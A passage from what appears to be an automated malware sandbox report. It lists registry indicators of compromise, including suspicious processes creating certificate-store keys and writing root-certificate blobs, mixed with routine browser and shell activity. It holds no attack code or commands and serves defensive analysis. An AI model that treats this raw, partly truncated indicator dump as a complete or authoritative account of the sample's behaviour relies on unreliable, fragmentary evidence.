Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stripe.network\Total = "14" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\Total = "303" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "567" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\m.stripe.network\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\5\MRUListEx = ffffffff Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7f745661612dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\Total = "329" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\2\MRUListEx = ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\volume.com\NumberOfSubdoma = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "395" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "162" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "303" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\NumberOfSubdoma = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "75" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "278" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "143" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\stripe.network\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\MRUListEx = 050000000400000003000000020000000100000000000000ffffffff Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\5\NodeSlot = "10" Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "472" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 Process not Found -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B zjqs2pkwltw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c124772656174657220